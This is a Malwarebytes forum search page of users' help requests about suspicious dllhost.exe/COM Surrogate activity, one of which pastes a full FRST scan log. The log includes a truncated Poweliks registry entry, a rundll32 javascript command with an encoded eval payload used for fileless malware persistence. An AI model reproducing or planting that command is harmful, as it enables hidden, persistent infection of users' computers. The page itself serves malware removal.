Jump to content

Search the Community

Showing results for tags 'dllhost'.

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Announcements
    • Malwarebytes News
    • Beta Testing Program
  • Malware Removal Help
    • Windows Malware Removal Help & Support
    • Mac Malware Removal Help & Support
    • Mobile Malware Removal Help & Support
    • Malware Removal Self-Help Guides
  • Malwarebytes for Home Support
    • Malwarebytes for Windows Support Forum
    • Malwarebytes for Mac Support Forum
    • Malwarebytes for Android Support Forum
    • Malwarebytes for iOS Support
    • Malwarebytes Privacy
    • Malwarebytes Browser Guard
    • False Positives
    • Comments and Suggestions
  • Malwarebytes for Business Support
    • Malwarebytes Endpoint Protection
    • Malwarebytes Incident Response (includes Breach Remediation)
    • Malwarebytes Endpoint Security
    • Malwarebytes Business Products Comments and Suggestions
  • Malwarebytes Tools and Other Products
    • Malwarebytes AdwCleaner
    • Malwarebytes Junkware Removal Tool Support
    • Malwarebytes Anti-Rootkit BETA Support
    • Malwarebytes Techbench USB (Legacy)
    • Malwarebytes Secure Backup discontinued
    • Other Tools
    • Malwarebytes Tools Comments and Suggestions
  • General Computer Help and Security Updates
    • BSOD, Crashes, Kernel Debugging
    • General Windows PC Help
  • Research Center
    • Newest Rogue-Ransomware Threats
    • Newest Malware Threats
    • Newest Mobile Threats
    • Newest IP or URL Threats
    • Newest Mac Threats
    • Report Scam Phone Numbers
  • General
    • General Chat
    • Forums Announcements & Feedback

Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


AIM


MSN


Website URL


ICQ


Yahoo


Jabber


Location


Interests

Found 24 results

  1. Hello again, I was looking some stuff up about COM surrogate and found out its legit, i thought it was weird since i've never seen it before. I then see its connected to dllhost.exe, i looked up dllhost.exe out of curiosity, and some people say you should only have one dllhost.exe located at c\windows\system32 i have this: https://imgur.com/a/LVeGb i'm on windows 10, is this normal to have 4? like i said some places online said you should only have one located at system32 windows folder, just want to know if this is completely fine. i have scanned a few times recently and haven't come up with any malware so i don't think i'm infected, just wanted to know if its normal to have 4 dllhost's instead of 1 as stated in some online forums. thanks to anyone who can give me some info about this!
  2. Hello, Recently i've had my DLL = (Dllhost.exe *32 Surrogate) Behave Strangely, Though it was only one instance of DLL, It was eating up to 130,000KB (so i closed it). When looking at processes from all users in the taskmanager I can only spot 2 instances of DLL running one from "SERVICE" and the other from "LOCAL SERVICE" (Both running at around 500KB) Both file locations lead here "C:\Windows\SysWOW64\dllhost.exe" Is this normal behavior or might this be a virus?? Ps: Pardon my english.
  3. I have a HP Pavilion dv7 notebook PC (Intel Core i5-2430M CPU 2.40 GHz) with 8 GB ram and 64-bit Windows 7 Home Premium operating system. I am up to date with Windows service pack and updates. I use the Windows Firewall, Microsoft Security Essentials, and Malwarebytes 2.0.4.1028 (Database version 2015.1.8.10). Lately, Malwarebytes has been giving a 'blocking malicious website' popup message constantly. On the popup, the process is C:\Windows\SysWOW64\dllhost.exe and the type is Outbound. The process and type are always the same - the IP and Port numbers change each time the popup occurs. The popups occur very frequently, one right after another. All I have done so far, besides running the usual security and malware scans, is close the popups - over and over again. I have had success with this forum removing a different type of malware last year so I decided to try you again. Please let me know what you need from me. I have attached a screenshot jpeg of the popup. bray5
  4. i have norton 360 and have run scans. i ran malawarebytes scan and anti rootkit scan. but i still have symptoms. slow computer and norton warnings about com surrogate, adclicker. please help, my computer rendered non functionally slow!
  5. I'm afraid I too must join those that are having an issue with this piece of malware. I ran the malwarebytes anti-malware scanner and it removed several issues but the COM Surrogate dllhost.exe*32 issue still remains. Any help that can be provided will be extremely helpful! Thanks, Brian Addition.txt FRST.txt
  6. As does its lesser known, yet still just as annoying siblings dllhst3g.exe and dpnsvr.exe. All three processes have been spotted running on this computer. The latter two appeared for the first time, that I've seen, after scanning with Malwarebytes Premium and uninstalling Microsoft Security Essentials, which I'm starting to believe the latter was not the best thing to do... Also, those two very processes were both running at the same time dllhost.exe was, and when I ended dllhost.exe, the former processes both ended, as well. Coincidence? I THINK NOT! I am also getting constant notifications that an outbound connection has been blocked, going to such trustworthy sites as fff5ee.com, film-site.org and, my favourite, a blank. The dllhost.exe thing had been going on for some weeks, now. Thought I just goofed something up, and after not being able to fix it, got your program to try and salvage this computer. Scanned in safe-mode and found that a plethora of crap was calling my computer home, yet this still continues. I saved the log of the stuff found during the scan that was removed, and I have .png files of the notifications that are now constantly popping up, via snip-it captures, if they are requested. I also have run FRST, like stated, and have also run GMER and TDSS-Killer, without modifying anything. Just getting as much info from .txt files on here so that the unlucky fellow who decides to attempt to help my sorry butt can come to the conclusion that I'm screwed more rapidly. I'm pretty sure my computer's infected with Ebola. An update while writing this. My computer began to run slow, so I went to go chop off the exposed head, and saw three new processes I did not recognise. All three died when dllhost.exe was slain by yours truly. Scan result of Farbar Recovery Scan Tool (FRST.txt) (x64) Version: 10-11-2014Ran by Calahan (administrator) on HP8100-2 on 10-11-2014 22:57:24Running from C:\Users\Calahan\DownloadsLoaded Profile: Calahan (Available profiles: Mike2 & Logan & Elisa & Calahan & Administrator & Guest)Platform: Windows 7 Professional Service Pack 1 (X64) OS Language: English (United States)Internet Explorer Version 9Boot Mode: NormalTutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use- farbar-recovery-scan-tool/ ==================== Processes (Whitelisted) ================= (If an entry is included in the fixlist, the process will be closed. The file will not be moved.) (AMD) C:\Windows\System32\atiesrxx.exe(AMD) C:\Windows\System32\atieclxx.exe(ActivIdentity) C:\Program Files\Common Files\ActivIdentity\ac.sharedstore.exe(ActivIdentity) C:\Program Files\ActivIdentity\ActivClient\acevents.exe(Microsoft Corporation) C:\Program Files\Microsoft Mouse and Keyboard Center\ipoint.exe(Microsoft Corporation) C:\Program Files\Microsoft Mouse and Keyboard Center\itype.exe(Microsoft Corporation) C:\Program Files (x86)\Skype\Toolbars\AutoUpdate\SkypeC2CAutoUpdateSvc.exe(Microsoft Corporation) C:\Program Files (x86)\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\LMS\LMS.exe() C:\Windows\SysWOW64\PnkBstrA.exe(GlavSoft LLC.) C:\Program Files (x86)\TightVNC\tvnserver.exe(Microsoft Corporation) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE(Google Inc.) C:\Program Files (x86)\Google\Update\1.3.25.5\GoogleCrashHandler.exe(Google Inc.) C:\Program Files (x86)\Google\Update\1.3.25.5\GoogleCrashHandler64.exe(Microsoft Corporation) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVCM.EXE(ActivIdentity) C:\Program Files\ActivIdentity\ActivClient\acevents.exe(ActivIdentity) C:\Program Files\ActivIdentity\ActivClient\accrdsub.exe() C:\Program Files\Plantronics\GameCom780\GameCom780.exe(Microsoft Corporation) C:\Program Files\Microsoft Xbox 360 Accessories\XBoxStat.exe(GlavSoft LLC.) C:\Program Files (x86)\TightVNC\tvnserver.exe(Logitech Inc.) C:\Program Files (x86)\Logitech\LWS\Webcam Software\LWS.exe(Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe(Advanced Micro Devices Inc.) C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\MOM.exe() C:\Program Files (x86)\Logitech\LWS\Webcam Software\CameraHelperShell.exe(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\IMSS\PrivacyIconClient.exe(ATI Technologies Inc.) C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\CCC.exe(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\UNS\UNS.exe(Microsoft Corporation) C:\Windows\System32\taskmgr.exe(Malwarebytes Corporation) C:\Program Files (x86)\Malwarebytes Anti-Malware\mbam.exe(Malwarebytes Corporation) C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe(Malwarebytes Corporation) C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamscheduler.exe(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe(Microsoft Corporation) C:\Windows\System32\SnippingTool.exe(Microsoft Corporation) C:\Windows\System32\wisptis.exe() C:\Users\Calahan\Downloads\nffvqpeh.exe(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe(Microsoft Corporation) C:\Program Files\Windows Defender\MpCmdRun.exe ==================== Registry (Whitelisted) ================== (If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.) HKLM\...\Run: [RtHDVCpl] => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [7938080 2009-07-02] (Realtek Semiconductor)HKLM\...\Run: [acevents] => C:\Program Files\ActivIdentity\ActivClient\acevents.exe [196648 2009-06-03] (ActivIdentity)HKLM\...\Run: [] => [X]HKLM\...\Run: [accrdsub] => C:\Program Files\ActivIdentity\ActivClient\accrdsub.exe [483880 2009-06-03] (ActivIdentity)HKLM\...\Run: [GamecomSound] => C:\Program Files\Plantronics\GameCom780\GameCom780.exe [777448 2011-12-01] ()HKLM\...\Run: [XboxStat] => C:\Program Files\Microsoft Xbox 360 Accessories\XboxStat.exe [825184 2009-09-30] (Microsoft Corporation)HKLM-x32\...\Run: [iMSS] => C:\Program Files (x86)\Intel\Intel® Management Engine Components\IMSS \PIconStartup.exe [111640 2009-11-04] ()HKLM-x32\...\Run: [File Sanitizer] => C:\Program Files (x86)\Hewlett-Packard\File Sanitizer\CoreShredder.exeHKLM-x32\...\Run: [Adobe Reader Speed Launcher] => "C:\Program Files (x86)\Adobe\Reader 10.0\Reader\Reader_sl.exe"HKLM-x32\...\Run: [bCSSync] => C:\Program Files (x86)\Microsoft Office\Office14\BCSSync.exe [89184 2012-11-05] (Microsoft Corporation)HKLM-x32\...\Run: [tvncontrol] => C:\Program Files (x86)\TightVNC\tvnserver.exe [815704 2010-07-08] (GlavSoft LLC.)HKLM-x32\...\Run: [Adobe ARM] => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [959904 2013-11-21] (Adobe Systems Incorporated)HKLM-x32\...\Run: [LWS] => C:\Program Files (x86)\Logitech\LWS\Webcam Software\LWS.exe [204136 2012-09-13] (Logitech Inc.)HKLM-x32\...\Run: [sunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [256896 2014-05-07] (Oracle Corporation)HKLM-x32\...\Run: [startCCC] => C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\amd64\CLIStart.exe [767200 2014-04-17] (Advanced Micro Devices, Inc.)HKLM-x32\...\RunOnce: [Malwarebytes Anti-Malware (cleanup)] => C:\ProgramData\Malwarebytes\Malwarebytes Anti- Malware\mbamdor.exe [54072 2014-10-01] (Malwarebytes Corporation)HKU\S-1-5-21-2217723503-548262416-3983414958-1007\...\Run: [Raptr] => C:\Program Files (x86)\Raptr\raptrstub.exe [55360 2014-06-24] (Raptr, Inc)HKU\S-1-5-21-2217723503-548262416-3983414958-1007\...\Run: [HydraVisionDesktopManager] => C:\Program Files (x86)\ATI Technologies\HydraVision\HydraDM.exe [380928 2009-10-19] (AMD)HKU\S-1-5-21-2217723503-548262416-3983414958-1007\...\Run: [Overwolf] => C:\Program Files (x86)\Overwolf \Overwolf.exe [39712 2014-10-22] (Overwolf LTD)HKU\S-1-5-21-2217723503-548262416-3983414958-1007\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\.. \mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 239 more characters). <==== Poweliks!Startup: C:\Users\Mike2\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Folding@home.lnkShortcutTarget: Folding@home.lnk -> C:\Program Files (x86)\FAHClient\HideConsole.exe ()Startup: C:\Users\Mike2\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OneNote 2010 Screen Clipper and Launcher.lnkShortcutTarget: OneNote 2010 Screen Clipper and Launcher.lnk -> C:\Program Files (x86)\Microsoft Office \Office14\ONENOTEM.EXE (Microsoft Corporation) ==================== Internet (Whitelisted) ==================== (If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.) HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = about:TabsStartMenuInternet: IEXPLORE.EXE - C:\Program Files (x86)\Internet Explorer\iexplore.exeSearchScopes: HKLM - {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = SearchScopes: HKLM - {2fa28606-de77-4029-af96-b231e3b8f827} URL = http://search.ask.com/web?q={searchterms} &l=dis&o=CMDTDFSearchScopes: HKLM - {b7fca997-d0fb-4fe0-8afd-255e89cf9671} URL = http://search.yahoo.com/search?p={searchTerms} &ei={inputEncoding}&fr=chr-hp-psg&type=CMDTDFSearchScopes: HKLM-x32 - {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = SearchScopes: HKLM-x32 - {2fa28606-de77-4029-af96-b231e3b8f827} URL = http://search.ask.com/web?q={searchterms} &l=dis&o=CMDTDFSearchScopes: HKLM-x32 - {b7fca997-d0fb-4fe0-8afd-255e89cf9671} URL = http://search.yahoo.com/search?p= {searchTerms}&ei={inputEncoding}&fr=chr-hp-psg&type=CMDTDFSearchScopes: HKCU - DefaultScope {ec29edf6-ad3c-4e1c-a087-d6cb81400c43} URL = SearchScopes: HKCU - {ec29edf6-ad3c-4e1c-a087-d6cb81400c43} URL = BHO: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> C:\Program Files\Microsoft Office \Office14\GROOVEEX.DLL (Microsoft Corporation)BHO: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files\Common Files \Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corporation)BHO: Skype Click to Call for Internet Explorer -> {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} -> C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\skypeieplugin.dll (Microsoft Corporation)BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office \Office14\URLREDIR.DLL (Microsoft Corporation)BHO-x32: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> C:\Program Files (x86)\Microsoft Office\Office14\GROOVEEX.DLL (Microsoft Corporation)BHO-x32: Java Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java \jre7\bin\ssv.dll (Oracle Corporation)BHO-x32: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corporation)BHO-x32: Skype Click to Call for Internet Explorer -> {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} -> C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll (Microsoft Corporation)BHO-x32: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files (x86)\Microsoft Office\Office14\URLREDIR.DLL (Microsoft Corporation)BHO-x32: Java Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java \jre7\bin\jp2ssv.dll (Oracle Corporation)DPF: HKLM-x32 {17492023-C23A-453E-A040-C7C580BBF700} http://download.microsoft.com/download/E/5/6/E5611B10-0D6D- 4117-8430-A67417AA88CD/LegitCheckControl.cabDPF: HKLM-x32 {E2883E8F-472F-4FB0-9522-AC9BF37916A7} http://platformdl.adobe.com/NOS/getPlusPlus/1.6/gp.cabHandler: belarc - {6318E0AB-2E93-11D1-B8ED-00608CC9A71F} - No FileHandler: skypec2c - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\skypeieplugin.dll (Microsoft Corporation)Handler-x32: belarc - {6318E0AB-2E93-11D1-B8ED-00608CC9A71F} - C:\Program Files (x86)\Belarc\BelarcAdvisor\System \BAVoilaX.dll (Belarc, Inc.)Handler-x32: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\Program Files (x86)\Common Files\Skype \Skype4COM.dll (Skype Technologies)Handler-x32: skypec2c - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll (Microsoft Corporation)Hosts: There are more than one entry in Hosts. See Hosts section of Addition.txtTcpip\Parameters: [DhcpNameServer] 75.75.76.76 75.75.75.75 192.168.3.1 FireFox:========FF Plugin: @microsoft.com/GENUINE -> disabled No FileFF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.30514.0\npctrl.dll ( Microsoft Corporation)FF Plugin: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~1\MICROS~1\Office14\NPAUTHZ.DLL (Microsoft Corporation)FF Plugin-x32: @java.com/DTPlugin,version=10.60.2 -> C:\Program Files (x86)\Java\jre7\bin\dtplugin \npDeployJava1.dll (Oracle Corporation)FF Plugin-x32: @java.com/JavaPlugin,version=10.60.2 -> C:\Program Files (x86)\Java\jre7\bin\plugin2\npjp2.dll (Oracle Corporation)FF Plugin-x32: @microsoft.com/GENUINE -> disabled No FileFF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight \5.1.30514.0\npctrl.dll ( Microsoft Corporation)FF Plugin-x32: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~2\MICROS~3\Office14\NPAUTHZ.DLL (Microsoft Corporation)FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~2\MICROS~3\Office14\NPSPWRAP.DLL (Microsoft Corporation)FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update \1.3.25.5\npGoogleUpdate3.dll (Google Inc.)FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update \1.3.25.5\npGoogleUpdate3.dll (Google Inc.)FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)FF Plugin HKU\S-1-5-21-2217723503-548262416-3983414958-1007: @unity3d.com/UnityPlayer,version=1.0 -> C:\Users \Calahan\AppData\LocalLow\Unity\WebPlayer\loader\npUnity3D32.dll (Unity Technologies ApS)FF Plugin HKU\S-1-5-21-2217723503-548262416-3983414958-1007: ubisoft.com/uplaypc -> C:\Program Files (x86)\Ubisoft \Ubisoft Game Launcher\npuplaypc.dll () Chrome: =======CHR HomePage: Default -> CHR StartupUrls: Default -> ""CHR Profile: C:\Users\Calahan\AppData\Local\Google\Chrome\User Data\DefaultCHR Extension: (Google Voice Search Hotword (Beta)) - C:\Users\Calahan\AppData\Local\Google\Chrome\User Data \Default\Extensions\bepbmhgboaologfdajaanbcjmnhjmhfn [2014-05-31]CHR Extension: (AdBlock) - C:\Users\Calahan\AppData\Local\Google\Chrome\User Data\Default\Extensions \gighmmpiobklfepjocnamgkkbiglidom [2014-11-05]CHR Extension: (Google Wallet) - C:\Users\Calahan\AppData\Local\Google\Chrome\User Data\Default\Extensions \nmmhkkegccagdldgiimedpiccmgmieda [2014-05-14]CHR HKLM-x32\...\Chrome\Extension: [lifbcibllhkdhoafpjfnlhfpfgnpldfl] - C:\Program Files (x86)\Skype\Toolbars \ChromeExtension\skype_chrome_extension.crx [2014-07-14]CHR HKLM-x32\...\Chrome\Extension: [ogccgbmabaphcakpiclgcnmcnimhokcj] - C:\Windows\SysWOW64\jmdp\SweetNT.crx [2014 -07-14] ==================== Services (Whitelisted) ================= (If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.) R2 ac.sharedstore; C:\Program Files\Common Files\ActivIdentity\ac.sharedstore.exe [277032 2009-06-03] (ActivIdentity)R2 c2cautoupdatesvc; C:\Program Files (x86)\Skype\Toolbars\AutoUpdate\SkypeC2CAutoUpdateSvc.exe [1390176 2014-07- 14] (Microsoft Corporation)R2 c2cpnrsvc; C:\Program Files (x86)\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe [1767520 2014-07-14] (Microsoft Corporation)R2 MBAMScheduler; C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamscheduler.exe [1871160 2014-10-01] (Malwarebytes Corporation)R2 MBAMService; C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe [968504 2014-10-01] (Malwarebytes Corporation)R2 Net Driver HPZ12; C:\Windows\system32\HPZinw12.dll [71680 2010-04-07] (Hewlett-Packard) [File not signed]S3 OverwolfUpdater; C:\Program Files (x86)\Overwolf\OverwolfUpdater.exe [997664 2014-10-22] (Overwolf LTD)R2 Pml Driver HPZ12; C:\Windows\system32\HPZipm12.dll [89600 2010-04-07] (Hewlett-Packard) [File not signed]R2 PnkBstrA; C:\Windows\SysWOW64\PnkBstrA.exe [75136 2014-02-28] ()R2 tvnserver; C:\Program Files (x86)\TightVNC\tvnserver.exe [815704 2010-07-08] (GlavSoft LLC.)S2 dwmrcs; No ImagePathS2 HP Health Check Service; "C:\Program Files (x86)\Hewlett-Packard\HP Health Check\hphc_service.exe" [X]S3 hpqwmiex; "C:\Program Files (x86)\Hewlett-Packard\Shared\hpqwmiex.exe" [X] ==================== Drivers (Whitelisted) ==================== (If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.) R3 DwMirror; C:\Windows\System32\DRIVERS\DamewareMini.sys [5632 2008-03-14] (DameWare Development, LLC)R1 dwvkbd; C:\Windows\System32\DRIVERS\dwvkbd64.sys [30720 2008-03-13] (DameWare)R3 MBAMProtector; C:\Windows\system32\drivers\mbam.sys [25816 2014-10-01] (Malwarebytes Corporation)R3 MBAMSwissArmy; C:\Windows\system32\drivers\MBAMSwissArmy.sys [129752 2014-11-10] (Malwarebytes Corporation)R3 MBAMWebAccessControl; C:\Windows\system32\drivers\mwac.sys [63704 2014-10-01] (Malwarebytes Corporation)S3 NAL; C:\Windows\system32\Drivers\iqvw64e.sys [32224 2009-09-21] (Intel Corporation ) [File not signed]R3 PlantronicsGC; C:\Windows\System32\drivers\PLTGC.sys [1327104 2011-11-04] (C-Media Electronics Inc)S3 PTHDRBUS; C:\Windows\System32\DRIVERS\PTHDRBUS.sys [69264 2009-12-15] (DEVGURU Co., LTD.)S3 PTHDRMDM; C:\Windows\System32\DRIVERS\PTHDRMDM.sys [176912 2009-12-15] (DEVGURU Co., LTD.(www.devguru.co.kr))S3 PTHDRVSP; C:\Windows\System32\DRIVERS\PTHDRVSP.sys [176912 2009-12-15] (DEVGURU Co., LTD.(www.devguru.co.kr))S3 RimUsb; C:\Windows\System32\Drivers\RimUsb_AMD64.sys [27520 2007-05-14] (Research In Motion Limited)U3 uxryipod; \??\C:\Users\Calahan\AppData\Local\Temp\uxryipod.sys [X] ==================== NetSvcs (Whitelisted) =================== (If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.) ==================== One Month Created Files and Folders ======== (If an entry is included in the fixlist, the file\folder will be moved.) 2014-11-10 22:57 - 2014-11-10 22:57 - 00017513 _____ () C:\Users\Calahan\Downloads\FRST.txt2014-11-10 22:43 - 2014-11-10 22:43 - 00000000 ____D () C:\Users\Calahan\Downloads\tdsskiller2014-11-10 22:42 - 2014-11-10 22:42 - 04163057 _____ () C:\Users\Calahan\Downloads\tdsskiller.zip2014-11-10 21:15 - 2014-11-10 21:16 - 00380416 _____ () C:\Users\Calahan\Downloads\nffvqpeh.exe2014-11-10 21:14 - 2014-11-10 22:57 - 00000000 ____D () C:\FRST2014-11-10 21:13 - 2014-11-10 21:13 - 02116096 _____ (Farbar) C:\Users\Calahan\Downloads\FRST64.exe2014-11-10 20:59 - 2014-11-10 20:59 - 00000129 _____ () C:\Users\Calahan\Downloads\malwarebytes.txt2014-11-10 20:30 - 2014-11-10 20:31 - 19828376 _____ (Malwarebytes Corporation ) C:\Users\Calahan\Downloads \mbam_premium.exe2014-11-10 20:17 - 2014-11-10 20:16 - 00042070 _____ () C:\Users\Calahan\Downloads\NOV-10-14.xml2014-11-10 20:16 - 2014-11-10 20:16 - 00000049 _____ () C:\Users\Calahan\Downloads\NOV-10-14.txt2014-11-10 19:43 - 2014-11-10 20:56 - 00129752 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers \MBAMSwissArmy.sys2014-11-10 19:43 - 2014-11-10 20:31 - 00001112 _____ () C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk2014-11-10 19:43 - 2014-11-10 20:31 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs \Malwarebytes Anti-Malware2014-11-10 19:43 - 2014-11-10 20:31 - 00000000 ____D () C:\Program Files (x86)\Malwarebytes Anti-Malware2014-11-10 19:43 - 2014-10-01 11:11 - 00093400 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers \mbamchameleon.sys2014-11-10 19:43 - 2014-10-01 11:11 - 00063704 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers \mwac.sys2014-11-10 19:43 - 2014-10-01 11:11 - 00025816 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers \mbam.sys2014-11-10 19:41 - 2014-11-10 19:42 - 19828376 _____ (Malwarebytes Corporation ) C:\Users\Calahan\Downloads\mbam- setup-2.0.3.1025.exe2014-11-09 23:50 - 2014-11-09 23:50 - 00003056 _____ () C:\Windows\System32\Tasks\{44A1741A-3325-5E3D-3774- F73A5D212500}2014-11-05 16:54 - 2014-11-05 16:54 - 00000000 ____D () C:\Users\Calahan\AppData\Roaming\BMMCegjc2014-11-04 16:36 - 2014-11-04 16:36 - 00000000 ____D () C:\Users\Calahan\AppData\Local\FalloutNV2014-11-04 01:12 - 2014-11-04 01:12 - 00000000 ____D () C:\Users\Calahan\Documents\Activision2014-11-03 21:31 - 2014-11-03 21:31 - 00000209 _____ () C:\Users\Calahan\Downloads\1OVPH1R.mp42014-11-03 19:34 - 2014-11-10 19:38 - 00000000 ____D () C:\Users\Calahan\AppData\Roaming\Coxoik2014-11-03 19:34 - 2014-11-03 19:36 - 00000000 ____D () C:\Users\Calahan\AppData\Roaming\Kudo2014-11-03 18:39 - 2014-11-03 19:34 - 00000000 ____D () C:\ProgramData\Windows Genuine Advantage2014-10-31 20:26 - 2014-11-02 21:02 - 00000000 ____D () C:\Users\Calahan\Documents\Prototype2014-10-30 18:17 - 2014-10-30 18:17 - 00001419 _____ () C:\Users\Calahan\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer (64-bit).lnk2014-10-29 19:50 - 2014-09-19 19:09 - 17867776 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll2014-10-29 19:50 - 2014-09-19 18:55 - 02339328 _____ (Microsoft Corporation) C:\Windows\system32\jscript9.dll2014-10-29 19:50 - 2014-09-19 18:50 - 01385472 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll2014-10-29 19:50 - 2014-09-19 18:49 - 01392128 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll2014-10-29 19:50 - 2014-09-19 18:48 - 01494016 _____ (Microsoft Corporation) C:\Windows\system32\inetcpl.cpl2014-10-29 19:50 - 2014-09-19 18:48 - 00086016 _____ (Microsoft Corporation) C:\Windows\system32\jsproxy.dll2014-10-29 19:50 - 2014-09-19 18:47 - 02157056 _____ (Microsoft Corporation) C:\Windows\system32\iertutil.dll2014-10-29 19:50 - 2014-09-19 18:47 - 00816640 _____ (Microsoft Corporation) C:\Windows\system32\jscript.dll2014-10-29 19:50 - 2014-09-19 18:47 - 00599040 _____ (Microsoft Corporation) C:\Windows\system32\vbscript.dll2014-10-29 19:50 - 2014-09-19 18:47 - 00173056 _____ (Microsoft Corporation) C:\Windows\system32\ieUnatt.exe2014-10-29 19:50 - 2014-09-19 18:46 - 02382848 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.tlb2014-10-29 19:50 - 2014-09-19 18:46 - 00453120 _____ (Microsoft Corporation) C:\Windows\system32\dxtmsft.dll2014-10-29 19:50 - 2014-09-19 18:46 - 00282112 _____ (Microsoft Corporation) C:\Windows\system32\dxtrans.dll2014-10-29 19:50 - 2014-09-19 18:46 - 00096768 _____ (Microsoft Corporation) C:\Windows\system32\mshtmled.dll2014-10-29 19:50 - 2014-09-19 18:46 - 00055296 _____ (Microsoft Corporation) C:\Windows\system32\msfeedsbs.dll2014-10-29 19:50 - 2014-09-19 18:45 - 00248320 _____ (Microsoft Corporation) C:\Windows\system32\ieui.dll2014-10-29 19:50 - 2014-09-19 18:45 - 00012800 _____ (Microsoft Corporation) C:\Windows\system32\mshta.exe2014-10-29 19:50 - 2014-09-19 17:53 - 12364288 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.dll2014-10-29 19:50 - 2014-09-19 17:44 - 01810432 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9.dll2014-10-29 19:50 - 2014-09-19 17:39 - 01138688 _____ (Microsoft Corporation) 